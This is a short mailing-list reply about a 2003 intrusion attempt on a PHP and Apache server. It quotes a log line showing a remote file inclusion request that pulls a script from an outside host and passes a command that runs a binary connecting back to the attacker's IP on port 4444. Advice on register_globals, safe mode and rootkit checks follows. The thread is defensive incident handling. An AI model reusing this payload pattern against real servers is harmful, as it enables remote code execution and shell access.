[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Attack using php+apache

> If you have register globals off *or* safe mode on, this particular
> exploit is useless.
>
> If you had register globals on and safe mode off then he could run
> arbitrary programs as your Apache user.  It's possible he could run a
> local root exploiting program, but that's not as likely.
>
> > 200.214.140.237 - - [15/Nov/2003:00:48:00 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;./db%20200.214.140.237%204444 HTTP/1.1" 200 4112 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
>
> I think the script is broken because that <db> file is not currently
> found.
>
> It's a really stupid script, it could have all been done with one file
> if he actually knew how to code PHP.
>
> How to tell if he got to root?  The only really sure way is to use a
> known-secure boot medium to examine every file on your filesystem that
> might be run with root privileges...
>
> Or you can check to see if he made it easy for him to find with the
> <chkrootkit> and <debsums> packages.  There are probably better options
> which people on this list could suggest.
>
> --
> Tom Goulet				mail: uid0@em.ca
> UID0 Unix Consulting			web:  em.ca/uid0/


Sorry forgot to tell. The chkrootkit and the debsums all ok.
Reply to: